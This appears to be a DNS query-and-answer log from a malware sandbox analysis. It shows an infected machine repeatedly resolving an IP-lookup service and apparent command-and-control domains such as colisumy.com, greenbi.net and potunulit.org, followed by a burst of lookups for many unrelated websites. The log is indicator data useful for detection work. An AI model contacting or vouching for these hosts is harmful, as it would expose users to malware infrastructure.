Jul 27, 2023 20:19:36.152961969 CEST	192.168.2.4	8.8.8.8	0x5b2b	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:36.477158070 CEST	192.168.2.4	8.8.8.8	0x2ab	Standard query (0)	greenbi.net	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:36.856086016 CEST	192.168.2.4	8.8.8.8	0xaccd	Standard query (0)	greenbi.net	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:37.108803034 CEST	192.168.2.4	8.8.8.8	0x8ca1	Standard query (0)	greenbi.net	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:37.494374037 CEST	192.168.2.4	8.8.8.8	0x359f	Standard query (0)	greenbi.net	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:37.888436079 CEST	192.168.2.4	8.8.8.8	0x58ed	Standard query (0)	greenbi.net	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:38.258503914 CEST	192.168.2.4	8.8.8.8	0x5f05	Standard query (0)	greenbi.net	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:38.618472099 CEST	192.168.2.4	8.8.8.8	0x6106	Standard query (0)	reinroot.top	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:39.649094105 CEST	192.168.2.4	8.8.8.8	0x1972	Standard query (0)	greenbi.net	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:39.744884014 CEST	192.168.2.4	8.8.8.8	0xc4c9	Standard query (0)	colisumy.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:39.981194973 CEST	192.168.2.4	8.8.8.8	0x2d86	Standard query (0)	greenbi.net	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:40.338210106 CEST	192.168.2.4	8.8.8.8	0xaca5	Standard query (0)	greenbi.net	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:40.655987024 CEST	192.168.2.4	8.8.8.8	0xf4e3	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:40.777457952 CEST	192.168.2.4	8.8.8.8	0xc4c9	Standard query (0)	colisumy.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:40.838639975 CEST	192.168.2.4	8.8.8.8	0x8163	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.466746092 CEST	192.168.2.4	8.8.8.8	0x78b	Standard query (0)	colisumy.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.559874058 CEST	192.168.2.4	8.8.8.8	0x1f50	Standard query (0)	greenbi.net	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.586626053 CEST	192.168.2.4	8.8.8.8	0xdf44	Standard query (0)	colisumy.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.755604029 CEST	192.168.2.4	8.8.8.8	0x8512	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:42.234112024 CEST	192.168.2.4	8.8.8.8	0xbfaa	Standard query (0)	greenbi.net	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:42.560511112 CEST	192.168.2.4	8.8.8.8	0xd4ac	Standard query (0)	h170013.srv22.test-hf.su	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:43.344320059 CEST	192.168.2.4	8.8.8.8	0xb2f1	Standard query (0)	greenbi.net	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:43.735531092 CEST	192.168.2.4	8.8.8.8	0xa708	Standard query (0)	greenbi.net	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:45.566767931 CEST	192.168.2.4	8.8.8.8	0xf1d2	Standard query (0)	greenbi.net	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:47.545770884 CEST	192.168.2.4	8.8.8.8	0xefb4	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:48.628762007 CEST	192.168.2.4	8.8.8.8	0xefb4	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:52.479748964 CEST	192.168.2.4	8.8.8.8	0x65a8	Standard query (0)	colisumy.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:52.504576921 CEST	192.168.2.4	8.8.8.8	0x8803	Standard query (0)	aa.imgjeoogbb.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:00.313002110 CEST	192.168.2.4	8.8.8.8	0x902b	Standard query (0)	aa.imgjeoogbb.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:20.829804897 CEST	192.168.2.4	8.8.8.8	0x67c1	Standard query (0)	www.fnw.us	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:20.829992056 CEST	192.168.2.4	8.8.8.8	0x9ebc	Standard query (0)	www.pr-park.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:20.830604076 CEST	192.168.2.4	8.8.8.8	0xfe3c	Standard query (0)	www.jenco.co.uk	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:20.830948114 CEST	192.168.2.4	8.8.8.8	0x9c04	Standard query (0)	www.baijaku.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:20.831356049 CEST	192.168.2.4	8.8.8.8	0x5dbf	Standard query (0)	www.wkhk.net	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:20.831739902 CEST	192.168.2.4	8.8.8.8	0x2d3d	Standard query (0)	www.pdqhomes.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:20.832103014 CEST	192.168.2.4	8.8.8.8	0x2391	Standard query (0)	www.dgmna.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:20.832231998 CEST	192.168.2.4	8.8.8.8	0xea7e	Standard query (0)	www.olras.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:20.832551003 CEST	192.168.2.4	8.8.8.8	0x8a35	Standard query (0)	www.quadlock.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:20.832963943 CEST	192.168.2.4	8.8.8.8	0x9b2d	Standard query (0)	www.ftchat.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:21.158638954 CEST	192.168.2.4	8.8.8.8	0xa3a4	Standard query (0)	www.rs-ag.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:21.298701048 CEST	192.168.2.4	8.8.8.8	0x9f3e	Standard query (0)	www.alteor.cl	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:21.384293079 CEST	192.168.2.4	8.8.8.8	0x965b	Standard query (0)	www.valdal.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:21.472084999 CEST	192.168.2.4	8.8.8.8	0xa7f2	Standard query (0)	www.item-pr.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:21.517260075 CEST	192.168.2.4	8.8.8.8	0xd818	Standard query (0)	www.vazir.se	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:21.600483894 CEST	192.168.2.4	8.8.8.8	0x395e	Standard query (0)	www.depalo.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:21.721786022 CEST	192.168.2.4	8.8.8.8	0x6d2d	Standard query (0)	www.credo.edu.pl	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:21.774626970 CEST	192.168.2.4	8.8.8.8	0x1138	Standard query (0)	www.elpro.si	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:22.033809900 CEST	192.168.2.4	8.8.8.8	0x17aa	Standard query (0)	www.petsfan.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:22.079711914 CEST	192.168.2.4	8.8.8.8	0x92d9	Standard query (0)	www.otena.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:22.470267057 CEST	192.168.2.4	8.8.8.8	0xaf0b	Standard query (0)	www.owsports.ca	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:22.472441912 CEST	192.168.2.4	8.8.8.8	0xe272	Standard query (0)	www.tvtools.fi	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:22.626324892 CEST	192.168.2.4	8.8.8.8	0x5497	Standard query (0)	www.evcpa.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:22.679877996 CEST	192.168.2.4	8.8.8.8	0xc134	Standard query (0)	www.transsib.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:22.763273954 CEST	192.168.2.4	8.8.8.8	0x8bc2	Standard query (0)	www.abart.pl	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:22.813920021 CEST	192.168.2.4	8.8.8.8	0xb68	Standard query (0)	www.abdg.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:23.128570080 CEST	192.168.2.4	8.8.8.8	0xbc46	Standard query (0)	www.ora.ecnet.jp	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:23.235549927 CEST	192.168.2.4	8.8.8.8	0x4340	Standard query (0)	www.xaicom.es	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:23.807414055 CEST	192.168.2.4	8.8.8.8	0x5fd	Standard query (0)	www.naoi-a.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:23.907649040 CEST	192.168.2.4	8.8.8.8	0xfe78	Standard query (0)	www.synetik.net	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:24.235724926 CEST	192.168.2.4	8.8.8.8	0x1855	Standard query (0)	www.iamdirt.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:24.236766100 CEST	192.168.2.4	8.8.8.8	0x2568	Standard query (0)	www.hummer.hu	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:24.384766102 CEST	192.168.2.4	8.8.8.8	0x1baf	Standard query (0)	www.yocinc.org	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:24.679913998 CEST	192.168.2.4	8.8.8.8	0xa393	Standard query (0)	www.aevga.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:24.735642910 CEST	192.168.2.4	8.8.8.8	0xdfa7	Standard query (0)	www.gpthink.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:24.839277983 CEST	192.168.2.4	8.8.8.8	0x7d40	Standard query (0)	www.wifi4all.nl	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:25.188731909 CEST	192.168.2.4	8.8.8.8	0x91d4	Standard query (0)	www.mqs.com.br	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:25.290405989 CEST	192.168.2.4	8.8.8.8	0x1a06	Standard query (0)	www.waldi.pl	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:28.742578030 CEST	192.168.2.4	8.8.8.8	0xc139	Standard query (0)	www.fcwcvt.org	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:28.863285065 CEST	192.168.2.4	8.8.8.8	0x11de	Standard query (0)	www.vitaindu.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:29.206352949 CEST	192.168.2.4	8.8.8.8	0x56a3	Standard query (0)	www.t-tre.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:29.429919958 CEST	192.168.2.4	8.8.8.8	0xc794	Standard query (0)	www.udesign.biz	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:29.538142920 CEST	192.168.2.4	8.8.8.8	0xce2b	Standard query (0)	www.stnic.co.uk	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:29.580157042 CEST	192.168.2.4	8.8.8.8	0xdfb4	Standard query (0)	www.holleman.us	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:29.756593943 CEST	192.168.2.4	8.8.8.8	0xe677	Standard query (0)	www.jacomfg.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:29.943475962 CEST	192.168.2.4	8.8.8.8	0xf0c	Standard query (0)	www.valselit.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:30.066354036 CEST	192.168.2.4	8.8.8.8	0x8667	Standard query (0)	www.snugpak.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:30.174283981 CEST	192.168.2.4	8.8.8.8	0x2d05	Standard query (0)	www.cokocoko.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:30.361625910 CEST	192.168.2.4	8.8.8.8	0x6c4e	Standard query (0)	www.netcr.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:31.455009937 CEST	192.168.2.4	8.8.8.8	0xac33	Standard query (0)	www.medisa.info	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:31.538511992 CEST	192.168.2.4	8.8.8.8	0xd36b	Standard query (0)	www.photo4b.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:31.766519070 CEST	192.168.2.4	8.8.8.8	0x6c4e	Standard query (0)	www.netcr.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:31.770286083 CEST	192.168.2.4	8.8.8.8	0x3163	Standard query (0)	www.2print.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:32.128609896 CEST	192.168.2.4	8.8.8.8	0x78f3	Standard query (0)	www.nelipak.nl	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:32.173862934 CEST	192.168.2.4	8.8.8.8	0xdb99	Standard query (0)	www.mobilnic.net	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:32.691298008 CEST	192.168.2.4	8.8.8.8	0x24bd	Standard query (0)	www.x0c.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:32.999273062 CEST	192.168.2.4	8.8.8.8	0x20c5	Standard query (0)	www.speelhal.net	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:33.411346912 CEST	192.168.2.4	8.8.8.8	0xca98	Standard query (0)	www.edimart.hu	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:33.591520071 CEST	192.168.2.4	8.8.8.8	0x8f26	Standard query (0)	www.lrsuk.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:33.949069977 CEST	192.168.2.4	8.8.8.8	0xbfb	Standard query (0)	www.findbc.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:34.143399954 CEST	192.168.2.4	8.8.8.8	0x99e6	Standard query (0)	www.yumgiskor.kz	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:34.706193924 CEST	192.168.2.4	8.8.8.8	0xd640	Standard query (0)	www.pupi.cz	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:35.096966028 CEST	192.168.2.4	8.8.8.8	0x7cae	Standard query (0)	www.c9dd.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:35.677088022 CEST	192.168.2.4	8.8.8.8	0xb9b0	Standard query (0)	www.pcgrate.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:35.678004980 CEST	192.168.2.4	8.8.8.8	0xce5a	Standard query (0)	www.usadig.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:36.278119087 CEST	192.168.2.4	8.8.8.8	0x4886	Standard query (0)	www.domon.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:37.377480984 CEST	192.168.2.4	8.8.8.8	0x1dc9	Standard query (0)	www.fink.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:37.506161928 CEST	192.168.2.4	8.8.8.8	0xa389	Standard query (0)	www.pwd.org	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:39.077306032 CEST	192.168.2.4	8.8.8.8	0x693b	Standard query (0)	www.nqks.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:40.227349997 CEST	192.168.2.4	8.8.8.8	0x318a	Standard query (0)	www.myropcb.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:41.954102993 CEST	192.168.2.4	8.8.8.8	0x26a2	Standard query (0)	www.medius.si	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:42.065248013 CEST	192.168.2.4	8.8.8.8	0xa6a1	Standard query (0)	www.ka-mo-me.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:42.592523098 CEST	192.168.2.4	8.8.8.8	0xa926	Standard query (0)	www.yoruksut.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:42.657035112 CEST	192.168.2.4	8.8.8.8	0x1e07	Standard query (0)	www.nunomira.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:42.989398956 CEST	192.168.2.4	8.8.8.8	0xf17e	Standard query (0)	www.wnsavoy.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:43.029122114 CEST	192.168.2.4	8.8.8.8	0xe89b	Standard query (0)	www.jroy.net	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:43.232150078 CEST	192.168.2.4	8.8.8.8	0xd3b7	Standard query (0)	www.com-sit.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:43.262011051 CEST	192.168.2.4	8.8.8.8	0x89ce	Standard query (0)	www.vexcom.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:43.362145901 CEST	192.168.2.4	8.8.8.8	0x1f4c	Standard query (0)	www.sjbs.org	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:44.519267082 CEST	192.168.2.4	8.8.8.8	0x3dd9	Standard query (0)	www.reglera.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 27, 2023 20:18:39.325226068 CEST	8.8.8.8	192.168.2.4	0x6cd3	No error (0)	potunulit.org		188.114.97.7	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:39.325226068 CEST	8.8.8.8	192.168.2.4	0x6cd3	No error (0)	potunulit.org		188.114.96.7	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:39.906853914 CEST	8.8.8.8	192.168.2.4	0x8ed2	No error (0)	colisumy.com		175.119.10.231	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:39.906853914 CEST	8.8.8.8	192.168.2.4	0x8ed2	No error (0)	colisumy.com		196.188.169.138	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:39.906853914 CEST	8.8.8.8	192.168.2.4	0x8ed2	No error (0)	colisumy.com		211.171.233.129	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:39.906853914 CEST	8.8.8.8	192.168.2.4	0x8ed2	No error (0)	colisumy.com		187.204.99.218	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:39.906853914 CEST	8.8.8.8	192.168.2.4	0x8ed2	No error (0)	colisumy.com		200.114.247.163	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:39.906853914 CEST	8.8.8.8	192.168.2.4	0x8ed2	No error (0)	colisumy.com		189.232.51.144	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:39.906853914 CEST	8.8.8.8	192.168.2.4	0x8ed2	No error (0)	colisumy.com		211.171.233.126	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:39.906853914 CEST	8.8.8.8	192.168.2.4	0x8ed2	No error (0)	colisumy.com		115.88.24.200	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:39.906853914 CEST	8.8.8.8	192.168.2.4	0x8ed2	No error (0)	colisumy.com		183.100.39.157	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:39.906853914 CEST	8.8.8.8	192.168.2.4	0x8ed2	No error (0)	colisumy.com		95.86.21.52	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:45.105437994 CEST	8.8.8.8	192.168.2.4	0xb8ef	No error (0)	potunulit.org		188.114.96.7	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:45.105437994 CEST	8.8.8.8	192.168.2.4	0xb8ef	No error (0)	potunulit.org		188.114.97.7	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:46.741362095 CEST	8.8.8.8	192.168.2.4	0xa04f	No error (0)	api.2ip.ua		162.0.217.254	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:48.850354910 CEST	8.8.8.8	192.168.2.4	0xfdd0	No error (0)	api.2ip.ua		162.0.217.254	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:49.836846113 CEST	8.8.8.8	192.168.2.4	0xe288	No error (0)	colisumy.com		115.88.24.200	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:49.836846113 CEST	8.8.8.8	192.168.2.4	0xe288	No error (0)	colisumy.com		183.100.39.157	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:49.836846113 CEST	8.8.8.8	192.168.2.4	0xe288	No error (0)	colisumy.com		95.86.21.52	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:49.836846113 CEST	8.8.8.8	192.168.2.4	0xe288	No error (0)	colisumy.com		175.119.10.231	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:49.836846113 CEST	8.8.8.8	192.168.2.4	0xe288	No error (0)	colisumy.com		196.188.169.138	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:49.836846113 CEST	8.8.8.8	192.168.2.4	0xe288	No error (0)	colisumy.com		211.171.233.129	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:49.836846113 CEST	8.8.8.8	192.168.2.4	0xe288	No error (0)	colisumy.com		187.204.99.218	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:49.836846113 CEST	8.8.8.8	192.168.2.4	0xe288	No error (0)	colisumy.com		200.114.247.163	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:49.836846113 CEST	8.8.8.8	192.168.2.4	0xe288	No error (0)	colisumy.com		189.232.51.144	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:49.836846113 CEST	8.8.8.8	192.168.2.4	0xe288	No error (0)	colisumy.com		211.171.233.126	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:51.120644093 CEST	8.8.8.8	192.168.2.4	0x24ea	No error (0)	api.2ip.ua		162.0.217.254	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:55.027614117 CEST	8.8.8.8	192.168.2.4	0x2f5b	No error (0)	potunulit.org		188.114.96.7	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:55.027614117 CEST	8.8.8.8	192.168.2.4	0x2f5b	No error (0)	potunulit.org		188.114.97.7	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:57.547703981 CEST	8.8.8.8	192.168.2.4	0x2b29	No error (0)	potunulit.org		188.114.97.7	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:57.547703981 CEST	8.8.8.8	192.168.2.4	0x2b29	No error (0)	potunulit.org		188.114.96.7	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:57.937407970 CEST	8.8.8.8	192.168.2.4	0xb7c3	No error (0)	nordskills.eu		213.6.54.58	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:59.129698992 CEST	8.8.8.8	192.168.2.4	0x4c47	No error (0)	potunulit.org		188.114.96.7	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:59.129698992 CEST	8.8.8.8	192.168.2.4	0x4c47	No error (0)	potunulit.org		188.114.97.7	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:01.792684078 CEST	8.8.8.8	192.168.2.4	0xcd9a	No error (0)	potunulit.org		188.114.97.7	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:01.792684078 CEST	8.8.8.8	192.168.2.4	0xcd9a	No error (0)	potunulit.org		188.114.96.7	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:02.470293999 CEST	8.8.8.8	192.168.2.4	0xf2df	No error (0)	api.2ip.ua		162.0.217.254	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:04.747632027 CEST	8.8.8.8	192.168.2.4	0x2bde	No error (0)	api.2ip.ua		162.0.217.254	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:05.093302965 CEST	8.8.8.8	192.168.2.4	0x4e75	No error (0)	us.imgjeoigaa.com		103.100.211.218	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:05.418575048 CEST	8.8.8.8	192.168.2.4	0xd1fc	No error (0)	api.2ip.ua		162.0.217.254	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:12.630484104 CEST	8.8.8.8	192.168.2.4	0x933f	No error (0)	aa.imgjeoogbb.com		154.221.26.108	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:13.619085073 CEST	8.8.8.8	192.168.2.4	0xc17b	No error (0)	api.2ip.ua		162.0.217.254	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:16.743650913 CEST	8.8.8.8	192.168.2.4	0xcc95	No error (0)	api.2ip.ua		162.0.217.254	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:16.985563993 CEST	8.8.8.8	192.168.2.4	0x4a19	No error (0)	aa.imgjeoogbb.com		154.221.26.108	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:19.885642052 CEST	8.8.8.8	192.168.2.4	0xf181	No error (0)	aa.imgjeoogbb.com		154.221.26.108	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:23.063611031 CEST	8.8.8.8	192.168.2.4	0xa1fa	No error (0)	aa.imgjeoogbb.com		154.221.26.108	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:23.364120007 CEST	8.8.8.8	192.168.2.4	0x4e80	No error (0)	potunulit.org		188.114.96.7	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:23.364120007 CEST	8.8.8.8	192.168.2.4	0x4e80	No error (0)	potunulit.org		188.114.97.7	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:24.838799953 CEST	8.8.8.8	192.168.2.4	0xb0c6	No error (0)	colisumy.com		183.100.39.157	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:24.838799953 CEST	8.8.8.8	192.168.2.4	0xb0c6	No error (0)	colisumy.com		95.86.21.52	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:24.838799953 CEST	8.8.8.8	192.168.2.4	0xb0c6	No error (0)	colisumy.com		175.119.10.231	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:24.838799953 CEST	8.8.8.8	192.168.2.4	0xb0c6	No error (0)	colisumy.com		196.188.169.138	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:24.838799953 CEST	8.8.8.8	192.168.2.4	0xb0c6	No error (0)	colisumy.com		211.171.233.129	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:24.838799953 CEST	8.8.8.8	192.168.2.4	0xb0c6	No error (0)	colisumy.com		187.204.99.218	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:24.838799953 CEST	8.8.8.8	192.168.2.4	0xb0c6	No error (0)	colisumy.com		200.114.247.163	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:24.838799953 CEST	8.8.8.8	192.168.2.4	0xb0c6	No error (0)	colisumy.com		189.232.51.144	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:24.838799953 CEST	8.8.8.8	192.168.2.4	0xb0c6	No error (0)	colisumy.com		211.171.233.126	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:24.838799953 CEST	8.8.8.8	192.168.2.4	0xb0c6	No error (0)	colisumy.com		115.88.24.200	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:27.412939072 CEST	8.8.8.8	192.168.2.4	0x2863	No error (0)	greenbi.net		185.12.79.25	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:27.412939072 CEST	8.8.8.8	192.168.2.4	0x2863	No error (0)	greenbi.net		211.119.84.111	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:27.412939072 CEST	8.8.8.8	192.168.2.4	0x2863	No error (0)	greenbi.net		211.40.39.251	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:27.412939072 CEST	8.8.8.8	192.168.2.4	0x2863	No error (0)	greenbi.net		195.158.3.162	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:27.412939072 CEST	8.8.8.8	192.168.2.4	0x2863	No error (0)	greenbi.net		211.119.84.112	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:27.412939072 CEST	8.8.8.8	192.168.2.4	0x2863	No error (0)	greenbi.net		190.224.203.37	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:27.412939072 CEST	8.8.8.8	192.168.2.4	0x2863	No error (0)	greenbi.net		187.156.114.216	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:27.412939072 CEST	8.8.8.8	192.168.2.4	0x2863	No error (0)	greenbi.net		200.114.247.163	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:27.412939072 CEST	8.8.8.8	192.168.2.4	0x2863	No error (0)	greenbi.net		151.251.31.98	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:27.412939072 CEST	8.8.8.8	192.168.2.4	0x2863	No error (0)	greenbi.net		196.188.169.138	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:27.829406977 CEST	8.8.8.8	192.168.2.4	0x2fef	No error (0)	greenbi.net		151.251.31.98	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:27.829406977 CEST	8.8.8.8	192.168.2.4	0x2fef	No error (0)	greenbi.net		196.188.169.138	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:27.829406977 CEST	8.8.8.8	192.168.2.4	0x2fef	No error (0)	greenbi.net		185.12.79.25	A (IP address)	IN (0x0001)	false
